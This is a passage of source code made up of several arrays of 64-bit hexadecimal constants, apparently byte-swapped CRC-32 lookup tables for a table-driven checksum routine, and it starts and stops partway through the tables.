0x9df3246f00000000, 0x651e739d00000000, 0xf2b86e7a00000000, 0xd4c3ada200000000, 0x4365b04500000000, 0xbb88e7b700000000, 0x2c2efa5000000000, 0xce23427700000000, 0x59855f9000000000, 0xa168086200000000, 0x36ce158500000000, 0x10b5d65d00000000, 0x8713cbba00000000, 0x7ffe9c4800000000, 0xe85881af00000000, 0x720e6b2200000000, 0xe5a876c500000000, 0x1d45213700000000, 0x8ae33cd000000000, 0xac98ff0800000000, 0x3b3ee2ef00000000, 0xc3d3b51d00000000, 0x5475a8fa00000000, 0x24af1f9600000000, 0xb309027100000000, 0x4be4558300000000, 0xdc42486400000000, 0xfa398bbc00000000, 0x6d9f965b00000000, 0x9572c1a900000000, 0x02d4dc4e00000000, 0x988236c300000000, 0x0f242b2400000000, 0xf7c97cd600000000, 0x606f613100000000, 0x4614a2e900000000, 0xd1b2bf0e00000000, 0x295fe8fc00000000, 0xbef9f51b00000000, 0x5cf44d3c00000000, 0xcb5250db00000000, 0x33bf072900000000, 0xa4191ace00000000, 0x8262d91600000000, 0x15c4c4f100000000, 0xed29930300000000, 0x7a8f8ee400000000, 0xe0d9646900000000, 0x777f798e00000000, 0x8f922e7c00000000, 0x1834339b00000000, 0x3e4ff04300000000, 0xa9e9eda400000000, 0x5104ba5600000000, 0xc6a2a7b100000000, 0x951fca1900000000, 0x02b9d7fe00000000, 0xfa54800c00000000, 0x6df29deb00000000, 0x4b895e3300000000, 0xdc2f43d400000000, 0x24c2142600000000, 0xb36409c100000000, 0x2932e34c00000000, 0xbe94feab00000000, 0x4679a95900000000, 0xd1dfb4be00000000, 0xf7a4776600000000, 0x60026a8100000000, 0x98ef3d7300000000, 0x0f49209400000000, 0xed4498b300000000, 0x7ae2855400000000, 0x820fd2a600000000, 0x15a9cf4100000000, 0x33d20c9900000000, 0xa474117e00000000, 0x5c99468c00000000, 0xcb3f5b6b00000000, 0x5169b1e600000000, 0xc6cfac0100000000, 0x3e22fbf300000000, 0xa984e61400000000, 0x8fff25cc00000000, 0x1859382b00000000, 0xe0b46fd900000000, 0x7712723e00000000}, {0x0000000000000000, 0x411b8c6e00000000, 0x823618dd00000000, 0xc32d94b300000000, 0x456b416100000000, 0x0470cd0f00000000, 0xc75d59bc00000000, 0x8646d5d200000000, 0x8ad682c200000000, 0xcbcd0eac00000000, 0x08e09a1f00000000, 0x49fb167100000000, 0xcfbdc3a300000000, 0x8ea64fcd00000000, 0x4d8bdb7e00000000, 0x0c90571000000000, 0x55ab745e00000000, 0x14b0f83000000000, 0xd79d6c8300000000, 0x9686e0ed00000000, 0x10c0353f00000000, 0x51dbb95100000000, 0x92f62de200000000, 0xd3eda18c00000000, 0xdf7df69c00000000, 0x9e667af200000000, 0x5d4bee4100000000, 0x1c50622f00000000, 0x9a16b7fd00000000, 0xdb0d3b9300000000, 0x1820af2000000000, 0x593b234e00000000, 0xaa56e9bc00000000, 0xeb4d65d200000000, 0x2860f16100000000, 0x697b7d0f00000000, 0xef3da8dd00000000, 0xae2624b300000000, 0x6d0bb00000000000, 0x2c103c6e00000000, 0x20806b7e00000000, 0x619be71000000000, 0xa2b673a300000000, 0xe3adffcd00000000, 0x65eb2a1f00000000, 0x24f0a67100000000, 0xe7dd32c200000000, 0xa6c6beac00000000, 0xfffd9de200000000, 0xbee6118c00000000, 0x7dcb853f00000000, 0x3cd0095100000000, 0xba96dc8300000000, 0xfb8d50ed00000000, 0x38a0c45e00000000, 0x79bb483000000000, 0x752b1f2000000000, 0x3430934e00000000, 0xf71d07fd00000000, 0xb6068b9300000000, 0x30405e4100000000, 0x715bd22f00000000, 0xb276469c00000000, 0xf36dcaf200000000, 0x15aba3a200000000, 0x54b02fcc00000000, 0x979dbb7f00000000, 0xd686371100000000, 0x50c0e2c300000000, 0x11db6ead00000000, 0xd2f6fa1e00000000, 0x93ed767000000000, 0x9f7d216000000000, 0xde66ad0e00000000, 0x1d4b39bd00000000, 0x5c50b5d300000000, 0xda16600100000000, 0x9b0dec6f00000000, 0x582078dc00000000, 0x193bf4b200000000, 0x4000d7fc00000000, 0x011b5b9200000000, 0xc236cf2100000000, 0x832d434f00000000, 0x056b969d00000000, 0x44701af300000000, 0x875d8e4000000000, 0xc646022e00000000, 0xcad6553e00000000, 0x8bcdd95000000000, 0x48e04de300000000, 0x09fbc18d00000000, 0x8fbd145f00000000, 0xcea6983100000000, 0x0d8b0c8200000000, 0x4c9080ec00000000, 0xbffd4a1e00000000, 0xfee6c67000000000, 0x3dcb52c300000000, 0x7cd0dead00000000, 0xfa960b7f00000000, 0xbb8d871100000000, 0x78a013a200000000, 0x39bb9fcc00000000, 0x352bc8dc00000000, 0x743044b200000000, 0xb71dd00100000000, 0xf6065c6f00000000, 0x704089bd00000000, 0x315b05d300000000, 0xf276916000000000, 0xb36d1d0e00000000, 0xea563e4000000000, 0xab4db22e00000000, 0x6860269d00000000, 0x297baaf300000000, 0xaf3d7f2100000000, 0xee26f34f00000000, 0x2d0b67fc00000000, 0x6c10eb9200000000, 0x6080bc8200000000, 0x219b30ec00000000, 0xe2b6a45f00000000, 0xa3ad283100000000, 0x25ebfde300000000, 0x64f0718d00000000, 0xa7dde53e00000000, 0xe6c6695000000000, 0x6b50369e00000000, 0x2a4bbaf000000000, 0xe9662e4300000000, 0xa87da22d00000000, 0x2e3b77ff00000000, 0x6f20fb9100000000, 0xac0d6f2200000000, 0xed16e34c00000000, 0xe186b45c00000000, 0xa09d383200000000, 0x63b0ac8100000000, 0x22ab20ef00000000, 0xa4edf53d00000000, 0xe5f6795300000000, 0x26dbede000000000, 0x67c0618e00000000, 0x3efb42c000000000, 0x7fe0ceae00000000, 0xbccd5a1d00000000, 0xfdd6d67300000000, 0x7b9003a100000000, 0x3a8b8fcf00000000, 0xf9a61b7c00000000, 0xb8bd971200000000, 0xb42dc00200000000, 0xf5364c6c00000000, 0x361bd8df00000000, 0x770054b100000000, 0xf146816300000000, 0xb05d0d0d00000000, 0x737099be00000000, 0x326b15d000000000, 0xc106df2200000000, 0x801d534c00000000, 0x4330c7ff00000000, 0x022b4b9100000000, 0x846d9e4300000000, 0xc576122d00000000, 0x065b869e00000000, 0x47400af000000000, 0x4bd05de000000000, 0x0acbd18e00000000, 0xc9e6453d00000000, 0x88fdc95300000000, 0x0ebb1c8100000000, 0x4fa090ef00000000, 0x8c8d045c00000000, 0xcd96883200000000, 0x94adab7c00000000, 0xd5b6271200000000, 0x169bb3a100000000, 0x57803fcf00000000, 0xd1c6ea1d00000000, 0x90dd667300000000, 0x53f0f2c000000000, 0x12eb7eae00000000, 0x1e7b29be00000000, 0x5f60a5d000000000, 0x9c4d316300000000, 0xdd56bd0d00000000, 0x5b1068df00000000, 0x1a0be4b100000000, 0xd926700200000000, 0x983dfc6c00000000, 0x7efb953c00000000, 0x3fe0195200000000, 0xfccd8de100000000, 0xbdd6018f00000000, 0x3b90d45d00000000, 0x7a8b583300000000, 0xb9a6cc8000000000, 0xf8bd40ee00000000, 0xf42d17fe00000000, 0xb5369b9000000000, 0x761b0f2300000000, 0x3700834d00000000, 0xb146569f00000000, 0xf05ddaf100000000, 0x33704e4200000000, 0x726bc22c00000000, 0x2b50e16200000000, 0x6a4b6d0c00000000, 0xa966f9bf00000000, 0xe87d75d100000000, 0x6e3ba00300000000, 0x2f202c6d00000000, 0xec0db8de00000000, 0xad1634b000000000, 0xa18663a000000000, 0xe09defce00000000, 0x23b07b7d00000000, 0x62abf71300000000, 0xe4ed22c100000000, 0xa5f6aeaf00000000, 0x66db3a1c00000000, 0x27c0b67200000000, 0xd4ad7c8000000000, 0x95b6f0ee00000000, 0x569b645d00000000, 0x1780e83300000000, 0x91c63de100000000, 0xd0ddb18f00000000, 0x13f0253c00000000, 0x52eba95200000000, 0x5e7bfe4200000000, 0x1f60722c00000000, 0xdc4de69f00000000, 0x9d566af100000000, 0x1b10bf2300000000, 0x5a0b334d00000000, 0x9926a7fe00000000, 0xd83d2b9000000000, 0x810608de00000000, 0xc01d84b000000000, 0x0330100300000000, 0x422b9c6d00000000, 0xc46d49bf00000000, 0x8576c5d100000000, 0x465b516200000000, 0x0740dd0c00000000, 0x0bd08a1c00000000, 0x4acb067200000000, 0x89e692c100000000, 0xc8fd1eaf00000000, 0x4ebbcb7d00000000, 0x0fa0471300000000, 0xcc8dd3a000000000, 0x8d965fce00000000}, {0x0000000000000000, 0x1dfdb50100000000, 0x3afa6b0300000000, 0x2707de0200000000, 0x74f4d70600000000, 0x6909620700000000, 0x4e0ebc0500000000, 0x53f3090400000000, 0xe8e8af0d00000000, 0xf5151a0c00000000, 0xd212c40e00000000, 0xcfef710f00000000, 0x9c1c780b00000000, 0x81e1cd0a00000000, 0xa6e6130800000000, 0xbb1ba60900000000, 0xd0d15f1b00000000, 0xcd2cea1a00000000, 0xea2b341800000000, 0xf7d6811900000000, 0xa425881d00000000, 0xb9d83d1c00000000, 0x9edfe31e00000000, 0x8322561f00000000, 0x3839f01600000000, 0x25c4451700000000, 0x02c39b1500000000, 0x1f3e2e1400000000, 0x4ccd271000000000, 0x5130921100000000, 0x76374c1300000000, 0x6bcaf91200000000, 0xa0a3bf3600000000, 0xbd5e0a3700000000, 0x9a59d43500000000, 0x87a4613400000000, 0xd457683000000000, 0xc9aadd3100000000, 0xeead033300000000, 0xf350b63200000000, 0x484b103b00000000, 0x55b6a53a00000000, 0x72b17b3800000000, 0x6f4cce3900000000, 0x3cbfc73d00000000, 0x2142723c00000000, 0x0645ac3e00000000, 0x1bb8193f00000000, 0x7072e02d00000000, 0x6d8f552c00000000, 0x4a888b2e00000000, 0x57753e2f00000000, 0x0486372b00000000, 0x197b822a00000000, 0x3e7c5c2800000000, 0x2381e92900000000, 0x989a4f2000000000, 0x8567fa2100000000, 0xa260242300000000, 0xbf9d912200000000, 0xec6e982600000000, 0xf1932d2700000000, 0xd694f32500000000, 0xcb69462400000000, 0x40477f6d00000000, 0x5dbaca6c00000000, 0x7abd146e00000000, 0x6740a16f00000000, 0x34b3a86b00000000, 0x294e1d6a00000000, 0x0e49c36800000000, 0x13b4766900000000, 0xa8afd06000000000, 0xb552656100000000, 0x9255bb6300000000, 0x8fa80e6200000000, 0xdc5b076600000000, 0xc1a6b26700000000, 0xe6a16c6500000000, 0xfb5cd96400000000, 0x9096207600000000, 0x8d6b957700000000, 0xaa6c4b7500000000, 0xb791fe7400000000, 0xe462f77000000000, 0xf99f427100000000, 0xde989c7300000000, 0xc365297200000000, 0x787e8f7b00000000, 0x65833a7a00000000, 0x4284e47800000000, 0x5f79517900000000, 0x0c8a587d00000000, 0x1177ed7c00000000, 0x3670337e00000000, 0x2b8d867f00000000, 0xe0e4c05b00000000, 0xfd19755a00000000, 0xda1eab5800000000, 0xc7e31e5900000000, 0x9410175d00000000, 0x89eda25c00000000, 0xaeea7c5e00000000, 0xb317c95f00000000, 0x080c6f5600000000, 0x15f1da5700000000, 0x32f6045500000000, 0x2f0bb15400000000, 0x7cf8b85000000000, 0x61050d5100000000, 0x4602d35300000000, 0x5bff665200000000, 0x30359f4000000000, 0x2dc82a4100000000, 0x0acff44300000000, 0x1732414200000000, 0x44c1484600000000, 0x593cfd4700000000, 0x7e3b234500000000, 0x63c6964400000000, 0xd8dd304d00000000, 0xc520854c00000000, 0xe2275b4e00000000, 0xffdaee4f00000000, 0xac29e74b00000000, 0xb1d4524a00000000, 0x96d38c4800000000, 0x8b2e394900000000, 0x808efeda00000000, 0x9d734bdb00000000, 0xba7495d900000000, 0xa78920d800000000, 0xf47a29dc00000000, 0xe9879cdd00000000, 0xce8042df00000000, 0xd37df7de00000000, 0x686651d700000000, 0x759be4d600000000, 0x529c3ad400000000, 0x4f618fd500000000, 0x1c9286d100000000, 0x016f33d000000000, 0x2668edd200000000, 0x3b9558d300000000, 0x505fa1c100000000, 0x4da214c000000000, 0x6aa5cac200000000, 0x77587fc300000000, 0x24ab76c700000000, 0x3956c3c600000000, 0x1e511dc400000000, 0x03aca8c500000000, 0xb8b70ecc00000000, 0xa54abbcd00000000, 0x824d65cf00000000, 0x9fb0d0ce00000000, 0xcc43d9ca00000000, 0xd1be6ccb00000000, 0xf6b9b2c900000000, 0xeb4407c800000000, 0x202d41ec00000000, 0x3dd0f4ed00000000, 0x1ad72aef00000000, 0x072a9fee00000000, 0x54d996ea00000000, 0x492423eb00000000, 0x6e23fde900000000, 0x73de48e800000000, 0xc8c5eee100000000, 0xd5385be000000000, 0xf23f85e200000000, 0xefc230e300000000, 0xbc3139e700000000, 0xa1cc8ce600000000, 0x86cb52e400000000, 0x9b36e7e500000000, 0xf0fc1ef700000000, 0xed01abf600000000, 0xca0675f400000000, 0xd7fbc0f500000000, 0x8408c9f100000000, 0x99f57cf000000000, 0xbef2a2f200000000, 0xa30f17f300000000, 0x1814b1fa00000000, 0x05e904fb00000000, 0x22eedaf900000000, 0x3f136ff800000000, 0x6ce066fc00000000, 0x711dd3fd00000000, 0x561a0dff00000000, 0x4be7b8fe00000000, 0xc0c981b700000000, 0xdd3434b600000000, 0xfa33eab400000000, 0xe7ce5fb500000000, 0xb43d56b100000000, 0xa9c0e3b000000000, 0x8ec73db200000000, 0x933a88b300000000, 0x28212eba00000000, 0x35dc9bbb00000000, 0x12db45b900000000, 0x0f26f0b800000000, 0x5cd5f9bc00000000, 0x41284cbd00000000, 0x662f92bf00000000, 0x7bd227be00000000, 0x1018deac00000000, 0x0de56bad00000000, 0x2ae2b5af00000000, 0x371f00ae00000000, 0x64ec09aa00000000, 0x7911bcab00000000, 0x5e1662a900000000, 0x43ebd7a800000000, 0xf8f071a100000000, 0xe50dc4a000000000, 0xc20a1aa200000000, 0xdff7afa300000000, 0x8c04a6a700000000, 0x91f913a600000000, 0xb6fecda400000000, 0xab0378a500000000, 0x606a3e8100000000, 0x7d978b8000000000, 0x5a90558200000000, 0x476de08300000000, 0x149ee98700000000, 0x09635c8600000000, 0x2e64828400000000, 0x3399378500000000, 0x8882918c00000000, 0x957f248d00000000, 0xb278fa8f00000000, 0xaf854f8e00000000, 0xfc76468a00000000, 0xe18bf38b00000000, 0xc68c2d8900000000, 0xdb71988800000000, 0xb0bb619a00000000, 0xad46d49b00000000, 0x8a410a9900000000, 0x97bcbf9800000000, 0xc44fb69c00000000, 0xd9b2039d00000000, 0xfeb5dd9f00000000, 0xe348689e00000000, 0x5853ce9700000000, 0x45ae7b9600000000, 0x62a9a59400000000, 0x7f54109500000000, 0x2ca7199100000000, 0x315aac9000000000, 0x165d729200000000, 0x0ba0c79300000000}, {0x0000000000000000, 0x24d9076300000000, 0x48b20fc600000000, 0x6c6b08a500000000, 0xd1626e5700000000, 0xf5bb693400000000, 0x99d0619100000000, 0xbd0966f200000000, 0xa2c5dcae00000000, 0x861cdbcd00000000, 0xea77d36800000000, 0xceaed40b00000000, 0x73a7b2f900000000, 0x577eb59a00000000, 0x3b15bd3f00000000, 0x1fccba5c00000000, 0x058dc88600000000, 0x2154cfe500000000, 0x4d3fc74000000000, 0x69e6c02300000000, 0xd4efa6d100000000, 0xf036a1b200000000, 0x9c5da91700000000, 0xb884ae7400000000, 0xa748142800000000, 0x8391134b00000000, 0xeffa1bee00000000, 0xcb231c8d00000000, 0x762a7a7f00000000, 0x52f37d1c00000000, 0x3e9875b900000000, 0x1a4172da00000000, 0x4b1ce0d600000000, 0x6fc5e7b500000000, 0x03aeef1000000000, 0x2777e87300000000, 0x9a7e8e8100000000, 0xbea789e200000000, 0xd2cc814700000000, 0xf615862400000000, 0xe9d93c7800000000, 0xcd003b1b00000000, 0xa16b33be00000000, 0x85b234dd00000000, 0x38bb522f00000000, 0x1c62554c00000000, 0x70095de900000000, 0x54d05a8a00000000, 0x4e91285000000000, 0x6a482f3300000000, 0x0623279600000000, 0x22fa20f500000000, 0x9ff3460700000000, 0xbb2a416400000000, 0xd74149c100000000, 0xf3984ea200000000, 0xec54f4fe00000000, 0xc88df39d00000000, 0xa4e6fb3800000000, 0x803ffc5b00000000, 0x3d369aa900000000, 0x19ef9dca00000000, 0x7584956f00000000, 0x515d920c00000000, 0xd73eb17600000000, 0xf3e7b61500000000, 0x9f8cbeb000000000, 0xbb55b9d300000000, 0x065cdf2100000000, 0x2285d84200000000, 0x4eeed0e700000000, 0x6a37d78400000000, 0x75fb6dd800000000, 0x51226abb00000000, 0x3d49621e00000000, 0x1990657d00000000, 0xa499038f00000000, 0x804004ec00000000, 0xec2b0c4900000000, 0xc8f20b2a00000000, 0xd2b379f000000000, 0xf66a7e9300000000, 0x9a01763600000000, 0xbed8715500000000, 0x03d117a700000000, 0x270810c400000000, 0x4b63186100000000, 0x6fba1f0200000000, 0x7076a55e00000000, 0x54afa23d00000000, 0x38c4aa9800000000, 0x1c1dadfb00000000, 0xa114cb0900000000, 0x85cdcc6a00000000, 0xe9a6c4cf00000000, 0xcd7fc3ac00000000, 0x9c2251a000000000, 0xb8fb56c300000000, 0xd4905e6600000000, 0xf049590500000000, 0x4d403ff700000000, 0x6999389400000000, 0x05f2303100000000, 0x212b375200000000, 0x3ee78d0e00000000, 0x1a3e8a6d00000000, 0x765582c800000000, 0x528c85ab00000000, 0xef85e35900000000, 0xcb5ce43a00000000, 0xa737ec9f00000000, 0x83eeebfc00000000, 0x99af992600000000, 0xbd769e4500000000, 0xd11d96e000000000, 0xf5c4918300000000, 0x48cdf77100000000, 0x6c14f01200000000, 0x007ff8b700000000, 0x24a6ffd400000000, 0x3b6a458800000000, 0x1fb342eb00000000, 0x73d84a4e00000000, 0x57014d2d00000000, 0xea082bdf00000000, 0xced12cbc00000000, 0xa2ba241900000000, 0x8663237a00000000, 0xae7d62ed00000000, 0x8aa4658e00000000, 0xe6cf6d2b00000000, 0xc2166a4800000000, 0x7f1f0cba00000000, 0x5bc60bd900000000, 0x37ad037c00000000, 0x1374041f00000000, 0x0cb8be4300000000, 0x2861b92000000000, 0x440ab18500000000, 0x60d3b6e600000000, 0xdddad01400000000, 0xf903d77700000000, 0x9568dfd200000000, 0xb1b1d8b100000000, 0xabf0aa6b00000000, 0x8f29ad0800000000, 0xe342a5ad00000000, 0xc79ba2ce00000000, 0x7a92c43c00000000, 0x5e4bc35f00000000, 0x3220cbfa00000000, 0x16f9cc9900000000, 0x093576c500000000, 0x2dec71a600000000, 0x4187790300000000, 0x655e7e6000000000, 0xd857189200000000, 0xfc8e1ff100000000, 0x90e5175400000000, 0xb43c103700000000, 0xe561823b00000000, 0xc1b8855800000000, 0xadd38dfd00000000, 0x890a8a9e00000000, 0x3403ec6c00000000, 0x10daeb0f00000000, 0x7cb1e3aa00000000, 0x5868e4c900000000, 0x47a45e9500000000, 0x637d59f600000000, 0x0f16515300000000, 0x2bcf563000000000, 0x96c630c200000000, 0xb21f37a100000000, 0xde743f0400000000, 0xfaad386700000000, 0xe0ec4abd00000000, 0xc4354dde00000000, 0xa85e457b00000000, 0x8c87421800000000, 0x318e24ea00000000, 0x1557238900000000, 0x793c2b2c00000000, 0x5de52c4f00000000, 0x4229961300000000, 0x66f0917000000000, 0x0a9b99d500000000, 0x2e429eb600000000, 0x934bf84400000000, 0xb792ff2700000000, 0xdbf9f78200000000, 0xff20f0e100000000, 0x7943d39b00000000, 0x5d9ad4f800000000, 0x31f1dc5d00000000, 0x1528db3e00000000, 0xa821bdcc00000000, 0x8cf8baaf00000000, 0xe093b20a00000000, 0xc44ab56900000000, 0xdb860f3500000000, 0xff5f085600000000, 0x933400f300000000, 0xb7ed079000000000, 0x0ae4616200000000, 0x2e3d660100000000, 0x42566ea400000000, 0x668f69c700000000, 0x7cce1b1d00000000, 0x58171c7e00000000, 0x347c14db00000000, 0x10a513b800000000, 0xadac754a00000000, 0x8975722900000000, 0xe51e7a8c00000000, 0xc1c77def00000000, 0xde0bc7b300000000, 0xfad2c0d000000000, 0x96b9c87500000000, 0xb260cf1600000000, 0x0f69a9e400000000, 0x2bb0ae8700000000, 0x47dba62200000000, 0x6302a14100000000, 0x325f334d00000000, 0x1686342e00000000, 0x7aed3c8b00000000, 0x5e343be800000000, 0xe33d5d1a00000000, 0xc7e45a7900000000, 0xab8f52dc00000000, 0x8f5655bf00000000, 0x909aefe300000000, 0xb443e88000000000, 0xd828e02500000000, 0xfcf1e74600000000, 0x41f881b400000000, 0x652186d700000000, 0x094a8e7200000000, 0x2d93891100000000, 0x37d2fbcb00000000, 0x130bfca800000000, 0x7f60f40d00000000, 0x5bb9f36e00000000, 0xe6b0959c00000000, 0xc26992ff00000000, 0xae029a5a00000000, 0x8adb9d3900000000, 0x9517276500000000, 0xb1ce200600000000, 0xdda528a300000000, 0xf97c2fc000000000, 0x4475493200000000, 0x60ac4e5100000000, 0x0cc746f400000000, 0x281e419700000000}, {0x0000000000000000, 0x08e3603c00000000, 0x10c6c17800000000, 0x1825a14400000000, 0x208c83f100000000, 0x286fe3cd00000000, 0x304a428900000000, 0x38a922b500000000, 0x011e763800000000, 0x09fd160400000000, 0x11d8b74000000000, 0x193bd77c00000000, 0x2192f5c900000000, 0x297195f500000000, 0x315434b100000000, 0x39b7548d00000000, 0x023cec7000000000, 0x0adf8c4c00000000, 0x12fa2d0800000000, 0x1a194d3400000000, 0x22b06f8100000000, 0x2a530fbd00000000, 0x3276aef900000000, 0x3a95cec500000000, 0x03229a4800000000, 0x0bc1fa7400000000, 0x13e45b3000000000, 0x1b073b0c00000000, 0x23ae19b900000000, 0x2b4d798500000000, 0x3368d8c100000000, 0x3b8bb8fd00000000, 0x0478d8e100000000, 0x0c9bb8dd00000000, 0x14be199900000000, 0x1c5d79a500000000, 0x24f45b1000000000, 0x2c173b2c00000000, 0x34329a6800000000, 0x3cd1fa5400000000, 0x0566aed900000000, 0x0d85cee500000000, 0x15a06fa100000000, 0x1d430f9d00000000, 0x25ea2d2800000000, 0x2d094d1400000000, 0x352cec5000000000, 0x3dcf8c6c00000000, 0x0644349100000000, 0x0ea754ad00000000, 0x1682f5e900000000, 0x1e6195d500000000, 0x26c8b76000000000, 0x2e2bd75c00000000, 0x360e761800000000, 0x3eed162400000000, 0x075a42a900000000, 0x0fb9229500000000, 0x179c83d100000000, 0x1f7fe3ed00000000, 0x27d6c15800000000, 0x2f35a16400000000, 0x3710002000000000, 0x3ff3601c00000000, 0x49f6c11800000000, 0x4115a12400000000, 0x5930006000000000, 0x51d3605c00000000, 0x697a42e900000000, 0x619922d500000000, 0x79bc839100000000, 0x715fe3ad00000000, 0x48e8b72000000000, 0x400bd71c00000000, 0x582e765800000000, 0x50cd166400000000, 0x686434d100000000, 0x608754ed00000000, 0x78a2f5a900000000, 0x7041959500000000, 0x4bca2d6800000000, 0x43294d5400000000, 0x5b0cec1000000000, 0x53ef8c2c00000000, 0x6b46ae9900000000, 0x63a5cea500000000, 0x7b806fe100000000, 0x73630fdd00000000, 0x4ad45b5000000000, 0x42373b6c00000000, 0x5a129a2800000000, 0x52f1fa1400000000, 0x6a58d8a100000000, 0x62bbb89d00000000, 0x7a9e19d900000000, 0x727d79e500000000, 0x4d8e19f900000000, 0x456d79c500000000, 0x5d48d88100000000, 0x55abb8bd00000000, 0x6d029a0800000000, 0x65e1fa3400000000, 0x7dc45b7000000000, 0x75273b4c00000000, 0x4c906fc100000000, 0x44730ffd00000000, 0x5c56aeb900000000, 0x54b5ce8500000000, 0x6c1cec3000000000, 0x64ff8c0c00000000, 0x7cda2d4800000000, 0x74394d7400000000, 0x4fb2f58900000000, 0x475195b500000000, 0x5f7434f100000000, 0x579754cd00000000, 0x6f3e767800000000, 0x67dd164400000000, 0x7ff8b70000000000, 0x771bd73c00000000, 0x4eac83b100000000, 0x464fe38d00000000, 0x5e6a42c900000000, 0x568922f500000000, 0x6e20004000000000, 0x66c3607c00000000, 0x7ee6c13800000000, 0x7605a10400000000, 0x92ec833100000000, 0x9a0fe30d00000000, 0x822a424900000000, 0x8ac9227500000000, 0xb26000c000000000, 0xba8360fc00000000, 0xa2a6c1b800000000, 0xaa45a18400000000, 0x93f2f50900000000, 0x9b11953500000000, 0x8334347100000000, 0x8bd7544d00000000, 0xb37e76f800000000, 0xbb9d16c400000000, 0xa3b8b78000000000, 0xab5bd7bc00000000, 0x90d06f4100000000, 0x98330f7d00000000, 0x8016ae3900000000, 0x88f5ce0500000000, 0xb05cecb000000000, 0xb8bf8c8c00000000, 0xa09a2dc800000000, 0xa8794df400000000, 0x91ce197900000000, 0x992d794500000000, 0x8108d80100000000, 0x89ebb83d00000000, 0xb1429a8800000000, 0xb9a1fab400000000, 0xa1845bf000000000, 0xa9673bcc00000000, 0x96945bd000000000, 0x9e773bec00000000, 0x86529aa800000000, 0x8eb1fa9400000000, 0xb618d82100000000, 0xbefbb81d00000000, 0xa6de195900000000, 0xae3d796500000000, 0x978a2de800000000, 0x9f694dd400000000, 0x874cec9000000000, 0x8faf8cac00000000, 0xb706ae1900000000, 0xbfe5ce2500000000, 0xa7c06f6100000000, 0xaf230f5d00000000, 0x94a8b7a000000000, 0x9c4bd79c00000000, 0x846e76d800000000, 0x8c8d16e400000000, 0xb424345100000000, 0xbcc7546d00000000, 0xa4e2f52900000000, 0xac01951500000000, 0x95b6c19800000000, 0x9d55a1a400000000, 0x857000e000000000, 0x8d9360dc00000000, 0xb53a426900000000, 0xbdd9225500000000, 0xa5fc831100000000, 0xad1fe32d00000000, 0xdb1a422900000000, 0xd3f9221500000000, 0xcbdc835100000000, 0xc33fe36d00000000, 0xfb96c1d800000000, 0xf375a1e400000000, 0xeb5000a000000000, 0xe3b3609c00000000, 0xda04341100000000, 0xd2e7542d00000000, 0xcac2f56900000000, 0xc221955500000000, 0xfa88b7e000000000, 0xf26bd7dc00000000, 0xea4e769800000000, 0xe2ad16a400000000, 0xd926ae5900000000, 0xd1c5ce6500000000, 0xc9e06f2100000000, 0xc1030f1d00000000, 0xf9aa2da800000000, 0xf1494d9400000000, 0xe96cecd000000000, 0xe18f8cec00000000, 0xd838d86100000000, 0xd0dbb85d00000000, 0xc8fe191900000000, 0xc01d792500000000, 0xf8b45b9000000000, 0xf0573bac00000000, 0xe8729ae800000000, 0xe091fad400000000, 0xdf629ac800000000, 0xd781faf400000000, 0xcfa45bb000000000, 0xc7473b8c00000000, 0xffee193900000000, 0xf70d790500000000, 0xef28d84100000000, 0xe7cbb87d00000000, 0xde7cecf000000000, 0xd69f8ccc00000000, 0xceba2d8800000000, 0xc6594db400000000, 0xfef06f0100000000, 0xf6130f3d00000000, 0xee36ae7900000000, 0xe6d5ce4500000000, 0xdd5e76b800000000, 0xd5bd168400000000, 0xcd98b7c000000000, 0xc57bd7fc00000000, 0xfdd2f54900000000, 0xf531957500000000, 0xed14343100000000, 0xe5f7540d00000000, 0xdc40008000000000, 0xd4a360bc00000000, 0xcc86c1f800000000, 0xc465a1c400000000, 0xfccc837100000000, 0xf42fe34d00000000, 0xec0a420900000000, 0xe4e9223500000000}, {0x0000000000000000, 0xd1e8e70e00000000, 0xa2d1cf1d00000000, 0x7339281300000000, 0x44a39f3b00000000, 0x954b783500000000, 0xe672502600000000, 0x379ab72800000000, 0x88463f7700000000, 0x59aed87900000000, 0x2a97f06a00000000, 0xfb7f176400000000, 0xcce5a04c00000000, 0x1d0d474200000000, 0x6e346f5100000000, 0xbfdc885f00000000, 0x108d7eee00000000, 0xc16599e000000000, 0xb25cb1f300000000, 0x63b456fd00000000, 0x542ee1d500000000, 0x85c606db00000000, 0xf6ff2ec800000000, 0x2717c9c600000000, 0x98cb419900000000, 0x4923a69700000000, 0x3a1a8e8400000000, 0xebf2698a00000000, 0xdc68dea200000000, 0x0d8039ac00000000, 0x7eb911bf00000000, 0xaf51f6b100000000, 0x611c8c0700000000, 0xb0f46b0900000000, 0xc3cd431a00000000, 0x1225a41400000000, 0x25bf133c00000000, 0xf457f43200000000, 0x876edc2100000000, 0x56863b2f00000000, 0xe95ab37000000000, 0x38b2547e00000000, 0x4b8b7c6d00000000, 0x9a639b6300000000, 0xadf92c4b00000000, 0x7c11cb4500000000, 0x0f28e35600000000, 0xdec0045800000000, 0x7191f2e900000000, 0xa07915e700000000, 0xd3403df400000000, 0x02a8dafa00000000, 0x35326dd200000000, 0xe4da8adc00000000, 0x97e3a2cf00000000, 0x460b45c100000000, 0xf9d7cd9e00000000, 0x283f2a9000000000, 0x5b06028300000000, 0x8aeee58d00000000, 0xbd7452a500000000, 0x6c9cb5ab00000000, 0x1fa59db800000000, 0xce4d7ab600000000, 0xc238180f00000000, 0x13d0ff0100000000, 0x60e9d71200000000, 0xb101301c00000000, 0x869b873400000000, 0x5773603a00000000, 0x244a482900000000, 0xf5a2af2700000000, 0x4a7e277800000000, 0x9b96c07600000000, 0xe8afe86500000000, 0x39470f6b00000000, 0x0eddb84300000000, 0xdf355f4d00000000, 0xac0c775e00000000, 0x7de4905000000000, 0xd2b566e100000000, 0x035d81ef00000000, 0x7064a9fc00000000, 0xa18c4ef200000000, 0x9616f9da00000000, 0x47fe1ed400000000, 0x34c736c700000000, 0xe52fd1c900000000, 0x5af3599600000000, 0x8b1bbe9800000000, 0xf822968b00000000, 0x29ca718500000000, 0x1e50c6ad00000000, 0xcfb821a300000000, 0xbc8109b000000000, 0x6d69eebe00000000, 0xa324940800000000, 0x72cc730600000000, 0x01f55b1500000000, 0xd01dbc1b00000000, 0xe7870b3300000000, 0x366fec3d00000000, 0x4556c42e00000000, 0x94be232000000000, 0x2b62ab7f00000000, 0xfa8a4c7100000000, 0x89b3646200000000, 0x585b836c00000000, 0x6fc1344400000000, 0xbe29d34a00000000, 0xcd10fb5900000000, 0x1cf81c5700000000, 0xb3a9eae600000000, 0x62410de800000000, 0x117825fb00000000, 0xc090c2f500000000, 0xf70a75dd00000000, 0x26e292d300000000, 0x55dbbac000000000, 0x84335dce00000000, 0x3befd59100000000, 0xea07329f00000000, 